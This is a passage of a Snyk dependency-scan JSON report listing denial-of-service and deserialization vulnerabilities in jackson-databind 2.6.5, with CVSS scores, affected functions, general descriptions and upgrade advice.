2.12.6.1, 2.13.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2816)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/3416)\n", - "epssDetails": { - "percentile": "0.60309", - "probability": "0.00218", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36518" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2022-03-11T13:26:43.073121Z", - "functions_new": [ - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "className": 
"com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla", - "functionName": "mapArray" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", - "functionName": "createContextual" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", - "functionName": "mapObject" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2022-03-11T13:18:25Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2022-03-11T14:24:04Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.929583Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.4.0,2.12.7.1)", - "[2.13.0,2.13.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.12.7.1", - "2.13.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.9, - "functions": [], - 
"malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490", - "title": "Chromium Bugs" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3582", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:50.588412Z" - }, - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:52:30.271111Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:57.261115Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:36.201956Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:50.588412Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:30.271111Z" - }, - { - "type": "secondary", - "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:57.261115Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeFromArray()` function in `BeanDeserializer`, due to resource exhaustion when processing a deeply nested array.\r\n\r\n**NOTE:**\r\nFor this vulnerability to be exploitable the non-default `DeserializationFeature` must be enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3582)\n", - "epssDetails": { - "percentile": "0.66401", - "probability": "0.00264", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-42004" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2022-10-02T09:21:18.588353Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-02T09:07:28Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2022-10-02T10:05:31.043255Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.261115Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", - "title": 
"Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.4.0,2.12.7.1)", - "[2.13.0,2.13.4.1)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.12.7.1", - "2.13.4.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.9, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020", - "title": "Chromium Bugs" - }, - { - "url": "https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html%23UNWRAP_SINGLE_VALUE_ARRAYS", - "title": "Documentation" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3590", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:50.575208Z" - }, - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:52:30.263069Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": 
"2024-03-11T09:53:57.258948Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:36.284440Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:50.575208Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:30.263069Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:57.258948Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeWrappedValue()` function in `StdDeserializer.java`, due to resource exhaustion when processing deeply nested arrays.\r\n\r\n**NOTE:** This vulnerability is only exploitable when the non-default `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020)\n- [Documentation](https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html#UNWRAP_SINGLE_VALUE_ARRAYS)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3590)\n", - "epssDetails": { - "percentile": "0.65501", - "probability": "0.00252", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-42003" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": 
"com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2022-10-02T09:41:44.046865Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-02T09:22:10Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2022-10-02T09:54:05Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.258948Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Liao Xinxi" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.1)", - "[2.7.0,2.7.9.1)", - "[2.8.0,2.8.9)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.1", - "2.7.9.1", - "2.8.9" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.9)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": 
"com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/JavanXD/Demo-Exploit-Jackson-RCE", - "title": "Exploit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1599", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1462702", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:28.679692Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:49.385289Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.167922Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:28.679692Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:49.385289Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization 
of Untrusted Data. An attacker may exploit this issue by sending a maliciously crafted input to the `readValue` method of the `ObjectMapper`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.9 or higher.\n## References\n- [Exploit](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1599)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1462702)\n", - "epssDetails": { - "percentile": "0.97700", - "probability": "0.57112", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-7525" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-qxxx-2pp7-5hmx" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2017-09-14T14:43:48.569000Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.9)" - ], - "functionId": { - 
"className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-04-10T21:00:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2017-09-14T14:43:48Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.385289Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Liao Xinxi" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.1)", - "[2.7.0,2.7.9.1)", - "[2.8.0,2.8.10)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.6.7.1", - "2.7.9.1", - "2.8.10" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.10)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": 
"https://github.com/FasterXML/jackson-databind/commit/e8f043d1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1680", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1737", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1506612", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:53.619980Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:46.857906Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:13.013603Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:53.619980Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:46.857906Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for 
[CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e8f043d1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1680)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1737)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1506612)\n", - "epssDetails": { - "percentile": "0.92802", - "probability": "0.04801", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-15095" - ], - "CWE": [ - "CWE-184" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2017-11-07T13:13:32.343000Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.10)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-06-26T21:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - 
